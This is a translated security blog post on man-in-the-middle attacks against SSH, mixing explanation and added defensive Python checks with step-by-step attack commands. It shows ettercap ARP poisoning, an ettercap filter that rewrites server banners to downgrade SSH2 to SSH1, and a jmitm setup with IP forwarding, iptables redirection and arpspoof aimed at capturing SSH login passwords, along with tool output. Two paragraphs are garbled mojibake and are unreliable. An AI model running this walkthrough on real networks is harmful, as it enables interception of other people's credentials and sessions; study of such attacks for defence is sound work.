
Man-in-the-Middle Attacks on SSH V2

2012-12-19 10:48:52      Author: Dis9Team
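A man-in-the-middle attack (Man-in-the-Middle Attack, "MITM attack" for short) is an old technique that hackers have used for a long time, and it still has a great deal of room to grow today.

In network security, MITM attacks are very widely used; SMB session hijacking and DNS spoofing, both once rampant, are typical MITM techniques. As hacking techniques are applied more and more to making money, MITM has become one of the most threatening and most destructive attacks against online banking, online games and online transactions.
To defend against MITM attacks, confidential information can be encrypted before it is transmitted, so that even if a "man in the middle" intercepts it, it is hard to break. In addition, some authentication methods can detect MITM attacks.

As for the various kinds of session hijacking inside a LAN (proxies inside the LAN excepted), they all combine sniffing and spoofing and have to build on ARP and MAC addresses. Network administrators should therefore use switched networks (traffic carried by switches) instead of shared networks (traffic carried by hubs), which lowers the chance of being eavesdropped on. This does not eliminate session hijacking, though: static ARP entries, MAC+IP binding and similar methods are still needed to limit spoofing, along with connections that use authentication.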
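One way to check the MAC+IP binding mentioned above, added here as an example that is not part of the original article: the function audits ARP replies against a static binding table and reports any reply that contradicts it. The gateway address 5.5.5.1, its MAC and the capture lines are constructed assumptions.

```python
import re

# Matches tcpdump-style "ARP, Reply 5.5.5.1 is-at 08:00:..." lines and
# arpspoof-style "arp reply 5.5.5.1 is-at 8:0:..." lines.
ARP_REPLY = re.compile(
    r"arp,? reply (\d+(?:\.\d+){3}) is-at "
    r"([0-9a-f]{1,2}(?::[0-9a-f]{1,2}){5})", re.I)

def norm_mac(mac):
    """Zero-pad each octet so 8:0:0:0:0:3 equals 08:00:00:00:00:03."""
    return ":".join("%02x" % int(part, 16) for part in mac.split(":"))

def audit_arp(lines, bindings):
    """Check ARP replies against static IP->MAC bindings.

    Returns findings in first-seen order:
      ("binding-violation", ip, mac)  reply contradicts a static binding
      ("mac-changed", ip, mac)        unbound IP answered from a second MAC
    """
    bound = {ip: norm_mac(mac) for ip, mac in bindings.items()}
    first_seen = {}
    findings = []
    for line in lines:
        m = ARP_REPLY.search(line)
        if not m:
            continue
        ip, mac = m.group(1), norm_mac(m.group(2))
        if ip in bound:
            hit = ("binding-violation", ip, mac) if mac != bound[ip] else None
        else:
            known = first_seen.setdefault(ip, mac)
            hit = ("mac-changed", ip, mac) if mac != known else None
        if hit and hit not in findings:
            findings.append(hit)
    return findings

# Constructed data: 5.5.5.1 is an assumed gateway with an assumed MAC.
BINDINGS = {"5.5.5.1": "08:00:00:00:00:01"}
SAMPLE = [
    "10:48:01.000 ARP, Reply 5.5.5.1 is-at 08:00:00:00:00:01, length 28",
    "10:48:02.000 ARP, Reply 5.5.5.6 is-at 08:00:00:00:00:06, length 28",
    "8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.1 is-at 8:0:0:0:0:3",
    "8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.1 is-at 8:0:0:0:0:3",
    "10:48:05.000 ARP, Reply 5.5.5.6 is-at 08:00:00:00:00:03, length 28",
]

if __name__ == "__main__":
    for finding in audit_arp(SAMPLE, BINDINGS):
        print(finding)
```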

µ«ÊǶÔÓÚ“´úÀíÖмäÈ˹¥»÷”¶øÑÔ£¬ÒÔÉÏ·½·¨¾ÍÄÑÒÔ¼ûЧÁË£¬ÒòΪ´úÀí·þÎñÆ÷±¾À´¾ÍÊÇÒ»¸ö“ÖмäÈË”½ÇÉ«£¬¹¥»÷Õß²»ÐèÒª½øÐÐÈÎºÎÆÛÆ­¾ÍÄÜÈÃÊܺ¦Õß×Ô¼ºÁ¬½ÓÉÏÀ´£¬¶øÇÒ´úÀíÒ²²»Éæ¼°MACµÈÒòËØ£¬ËùÒÔÒ»°ãµÄ·À·¶´ëÊ©¶¼²»Æð×÷Óá£

³ý·ÇÄãÊÇÒª¸É»µÊ£¬»òÕßIP±»ÆÁ±Î£¬»òÕßÌìÉú¶ÔÍøÂçÓÐ×ſ־壬·ñÔò»¹ÊDz»ÒªÕûÌìÕÒÒ»¶Ñ´úÀíÀ´Òþ²Ø×Ô¼ºÁË£¬Ã»±ØÒªµÄ¡£³£ÔÚºÓ±ß×ߣ¬¼´Ê¹ÓöÉÏ×öÁËÊֽŵĴúÀíÒ²ÄѲì¾õ¡£

 

OpenSSH

OpenSSH is a free, open-source implementation of the SSH (Secure SHell) protocol. The SSH protocol family can be used for remote control or for transferring files between computers. The traditional ways of doing this, such as telnet (terminal emulation protocol), rcp, ftp, rlogin and rsh, are extremely insecure and send passwords in clear text. OpenSSH provides a server daemon and client tools that encrypt the data in remote control and file transfer, and so replaces those older services.
OpenSSH is an implementation of encrypted communication over computer networks using SSH. It is the open-source alternative to the commercial version provided by SSH Communications Security. OpenSSH is currently a sub-project of OpenBSD.
OpenSSH is often mistakenly thought to be related to OpenSSL, but the two projects have different purposes and different development teams; the names are similar only because both share the same goal: providing open-source software for encrypted communication.
OpenSSH supports SSH protocol versions 1.3, 1.5 and 2. Since OpenSSH version 2.9, the default protocol is version 2, which uses RSA keys by default.

Attacking low versions

For example, take this server's SSH version.
The version is very low, SSH-1.5-OpenSSH_6.0p1. Can it be ARP-spoofed directly?
Start ETTERCAP and run the ARP spoofing:

<pre>root@Dis9Team:~# ettercap -T -M arp // // -q -i eth5

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth5... (Ethernet)

  eth5 ->    08:00:00:00:00:03           5.5.5.3     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : ANY (all the hosts in the list)

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help</pre>

The client then connects over SSH:

<pre>brk $ ssh 5.5.5.6 -p 2222 -1
brk@5.5.5.6's password:
Last login: Sat Nov 17 19:30:29 2012 from 5.5.5.1</pre>

The password is captured successfully through ARP spoofing.

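Sshmitm

Sshmitm is one of the threatening tools that ship with Dsniff. If you are running dnsspoof to forge the hostname of a real machine, sshmitm can redirect ssh traffic to your machine. Because it supports only up to ssh1, this is also a reason to consider upgrading ssh to version 2.
Sshmitm works mainly by having the dnsspoof tool intercept ssh connections headed to another machine. You only need to start Sshmitm on port 22 (the -p option changes the port used) and set it to relay connections to the real host.
sshmitm can launch an MITM (Monkey-In-The-Middle) attack against an SSH session. (Note that "Monkey" here is the expansion given in the Dsniff package's readme file rather than the usual "Man"; the distinction makes no real difference, and perhaps comes from Dsniff using a monkey as its logo.)
With sshmitm an attacker can capture the login password of an SSH session and can even "hijack" the whole session (the attacker uses code provided by OpenSSL on their own host to generate a forged certificate and deceive the target host into believing it is the legitimate peer, so that the attacker's host becomes a relay for the SSH secure channel).
For SSH1, this kind of MITM attack already poses a serious threat.
MITM is not a new concept; it is an effective way of attacking authentication and key-exchange protocols. In an SSH session the server normally sends its public key to the client first. Strictly speaking, this key exchange and management ought to be based on an X.509 public key infrastructure (PKI), but PKI is complex enough that very few servers actually use such key management; usually the server simply generates a key pair itself and sends the public key to the client.
After receiving the server's public key, the client must verify its validity independently. Usually an SSH client has a local "key/hostname" database maintained by the sysadmin or another account. When connecting to an SSH server for the first time, the client may have been configured in advance to accept the server's public key automatically and record it in the local database, and that makes an MITM attack possible. In fact, every encrypted network has the same basic problem: to some extent, the initial connection of an encrypted channel is always set up over a potentially dangerous network, and if the key exchange mechanism is unsound, or is ignored altogether, the encrypted channel built on it exists in name only. In principle there is nothing wrong with protocols such as SSH themselves: as long as encryption and key exchange management (PKI, for example) are set up strictly according to the standard, an attacker has no opening. The trouble is that, for the sake of convenience, the "complicated" assurance techniques are often forgotten.
Of course, a protocol whose usability is poor may itself be the problem, and SSH2 now improves considerably on SSH1. Specifically, when the client receives an unknown server public key at the start of an SSH connection, OpenSSH can be configured to handle it in one of the following ways:

  • Automatically add the public key to the local database;
  • Issue the warning message listed below and ask the user whether to add the key or abandon the connection;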
    ————————————————————————
    – WARNING: HOST IDENTIFICATION HAS CHANGED! –
    ————————————————————————
    IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
    Someone could be eavesdropping on you right now (man-in-the-middle attack)! It is also possible that the host-key has just been changed. Please contact your system administrator.
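  • Refuse to accept it.

If the client's verification of unknown public keys has been turned off (or the client configuration already bypasses this step), or if the client's cache of known-host CA certificates has been "poisoned", an attacker may well be able to mount an MITM attack. Fundamentally, preventing MITM attacks depends on users strengthening their own security measures: for example, the initial key exchange can be done another way (by floppy disk, say), the local certificate list database should be strictly managed, and warning prompts should be examined carefully to guard against deception by a third party.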
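The independent verification described above can be done by comparing the fingerprint of a recorded host key with one obtained out of band. The following is an added example, not code from the original article or from OpenSSH; the `ssh-ed25519` entries it builds are constructed sample keys, not real host keys, and `sample_entry` is a hypothetical helper.

```python
import base64
import hashlib
import hmac
import struct

def fingerprints(known_hosts_line):
    """Return (key_type, md5_fp, sha256_fp) for one known_hosts entry."""
    fields = known_hosts_line.split()
    if fields and fields[0].startswith("@"):   # @cert-authority / @revoked
        fields = fields[1:]
    if len(fields) < 3:
        raise ValueError("expected: hosts keytype base64-key [comment]")
    key_type, blob = fields[1], base64.b64decode(fields[2], validate=True)
    # The blob starts with a length-prefixed copy of the key type; a
    # mismatch means the entry was edited or corrupted.
    (n,) = struct.unpack(">I", blob[:4])
    if blob[4:4 + n] != key_type.encode("ascii"):
        raise ValueError("key type does not match key blob")
    md5_hex = hashlib.md5(blob).hexdigest()
    md5_fp = ":".join(md5_hex[i:i + 2] for i in range(0, 32, 2))
    digest = hashlib.sha256(blob).digest()
    sha256_fp = "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    return key_type, md5_fp, sha256_fp

def matches_pin(known_hosts_line, pinned_fp):
    """Compare an entry with a fingerprint obtained out of band."""
    _, md5_fp, sha256_fp = fingerprints(known_hosts_line)
    if pinned_fp.startswith("SHA256:"):
        return hmac.compare_digest(sha256_fp, pinned_fp)
    pinned = pinned_fp.lower()
    if pinned.startswith("md5:"):
        pinned = pinned[4:]
    return hmac.compare_digest(md5_fp, pinned)

def sample_entry(host, key_bytes):
    """Constructed ssh-ed25519 entry for the demo (not a real host key)."""
    def ssh_string(data):
        return struct.pack(">I", len(data)) + data
    blob = ssh_string(b"ssh-ed25519") + ssh_string(key_bytes)
    return "%s ssh-ed25519 %s" % (host, base64.b64encode(blob).decode())

if __name__ == "__main__":
    genuine = sample_entry("5.5.5.6", bytes(range(32)))
    relayed = sample_entry("5.5.5.6", bytes(32))  # a different key
    pin = fingerprints(genuine)[2]
    print(pin, matches_pin(genuine, pin), matches_pin(relayed, pin))
```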

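Downgrade MITM attacks

A downgrade MITM attack lets the attacker force the client and/or the server to use a less secure protocol or feature set, one provided only for backward compatibility with older clients/servers. Sometimes a client supports servers that have different features, or different versions of the same feature, so client and server often have to negotiate which features and which versions to use. For example, many Secure Shell (SSH) clients support both v1 and v2 of the SSH protocol, as well as several different ciphers. (SSH is an encrypted network protocol used to connect to computers that offer command-line access.) v1 contains protocol flaws that allow an attacker to see the normally encrypted data exchanged between client and server.
For this reason, most people use SSH v2.
However, for backward compatibility, many servers and clients still support SSH v1. Using an MITM attack, an attacker can tell the server and the client, before encryption starts, to use the vulnerable SSH v1 protocol. To stop this kind of attack, most SSH clients and servers can be set to use only the SSH v2 protocol. A simple way to test whether a client honours this rule is to proxy the network traffic and tell the client to use the old version of the protocol.
Ettercap's rules for ARP attacks include the following filter: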

<pre>root@Dis9Team:/usr/share/ettercap# cat etter.filter.ssh
############################################################################
#                                                                          #
#  ettercap -- etter.filter -- filter source file                          #
#                                                                          #
#  Copyright (C) ALoR & NaGA                                               #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################

##
#
#   This filter will substitute the SSH server response from SSH-1.99 to
#   SSH-1.51, so if the server supports both ssh1 and ssh2 we will force
#   it to use ssh1... ;)
#   server response :    SSH-2.00   only ssh2 supported
#                        SSH-1.99   both ssh1 and ssh2 supported
#                        SSH-1.51   only ssh1 supported
##

if (ip.proto == TCP) {
   if (tcp.src == 22) {
      if ( replace("SSH-1.99", "SSH-1.51") ) {
         msg("[SSH Filter] SSH downgraded from version 2 to 1\n");
      } else {
         if ( search(DATA.data, "SSH-2.00") ) {
            msg("[SSH Filter] Server supports only SSH version 2\n");
         } else {
            if ( search(DATA.data, "SSH-1.51") ) {
               msg("[SSH Filter] Server already supports only version 1\n");
            }
         }
      }
   }
}

root@Dis9Team:/usr/share/ettercap#</pre>

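SSH 1.9 cannot be attacked through ARP spoofing, only SSH-1.5 can. If the server supports both 1.9 and 1.5, the 1.9 is replaced with version 1.5 and the ARP attack is then carried out.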
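From the defender's side, the rewrite described above can be detected by comparing the identification string a client received with the one the server is known to send, and any server that still advertises SSH1 can be flagged. This is an added example, not part of the original article; the banners are constructed, and the `reference` banner is assumed to come from a trusted vantage point such as the server's own console.

```python
import re

# RFC 4253 section 4.2: SSH-protoversion-softwareversion [SP comments] CR LF
IDENT = re.compile(r"^SSH-(\d+\.\d+)-(\S+)")

def parse_ident(raw):
    """Return (protoversion, softwareversion) from the first SSH- line.

    A server may send other text lines before its identification string,
    so every line is checked.
    """
    for line in raw.split(b"\n"):
        m = IDENT.match(line.rstrip(b"\r").decode("ascii", "replace"))
        if m:
            return m.group(1), m.group(2)
    raise ValueError("no SSH identification string")

def offered(protoversion):
    """Protocol majors the identification string advertises."""
    if protoversion == "1.99":          # compatibility mode: SSH1 and SSH2
        return {1, 2}
    return {2} if int(protoversion.split(".")[0]) >= 2 else {1}

def assess(seen, reference=None):
    """Flag SSH1 exposure and a banner rewritten in transit.

    seen      -- bytes the client received at the start of the connection
    reference -- banner read from a trusted vantage point (optional)
    """
    proto, software = parse_ident(seen)
    findings = []
    if 1 in offered(proto):
        findings.append("ssh1-offered")
    if reference is not None:
        ref_proto, ref_software = parse_ident(reference)
        if (ref_proto, ref_software) != (proto, software):
            findings.append("banner-mismatch")
        if 2 in offered(ref_proto) and 2 not in offered(proto):
            findings.append("ssh2-stripped")
    return findings

if __name__ == "__main__":
    # Constructed banners: what the client saw vs. what the server sends.
    print(assess(b"SSH-1.51-OpenSSH_4.6\r\n", b"SSH-1.99-OpenSSH_4.6\r\n"))
    print(assess(b"SSH-2.0-OpenSSH_4.6\r\n"))
```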

Attacking version 2.0

What if it is 2.0?

<pre>brk $ nc -vv 5.5.5.6 22
Connection to 5.5.5.6 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_4.6</pre>

jmitm can be used to carry out the ARP attack:

<pre>root@Dis9Team:/pen# wget http://www.david-guembel.de/uploads/media/jmitm2-0.1.0.tar.gz
root@Dis9Team:/pen# tar xf jmitm2-0.1.0.tar.gz
root@Dis9Team:/pen# cd jmitm2-0.1.0/
root@Dis9Team:/pen/jmitm2-0.1.0#</pre>

Two files need to be edited:

<pre>root@Dis9Team:/pen/jmitm2-0.1.0# nano bin/conf/server.xml</pre>

and the target host:

<pre>root@Dis9Team:/pen/jmitm2-0.1.0# nano bin/runm.sh</pre>

Send packets to spoof the gateway, and redirect the port:

<pre>root@Dis9Team:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@Dis9Team:~# iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT
root@Dis9Team:~# iptables -A FORWARD -j ACCEPT
root@Dis9Team:~# arpspoof -i eth5 -t 5.5.5.6 5.5.5.0
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3
8:0:0:0:0:3 8:0:0:0:0:6 0806 42: arp reply 5.5.5.0 is-at 8:0:0:0:0:3</pre>

When the other side connects over SSH, the password is captured successfully.
If the target has connected before, an SSH key mismatch may appear:

<pre>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the DSA key sent by the remote host is
dc:77:1e:b0:1b:a1:7c:71:33:1f:75:32:fe:e5:2e:28.
Please contact your system administrator.
Add correct host key in /home/brk/.ssh/known_hosts to get rid of this message.
Offending DSA key in /home/brk/.ssh/known_hosts:57
remove with: ssh-keygen -f "/home/brk/.ssh/known_hosts" -R 5.5.5.6
DSA host key for 5.5.5.6 has changed and you have requested strict checking.
Host key verification failed.
brk $</pre>

But the limitations of this thing are too great!

References

http://www.david-guembel.de/index.php?id=6

Tutorial on the powerful sniffing tool ettercap: my spoofing rules
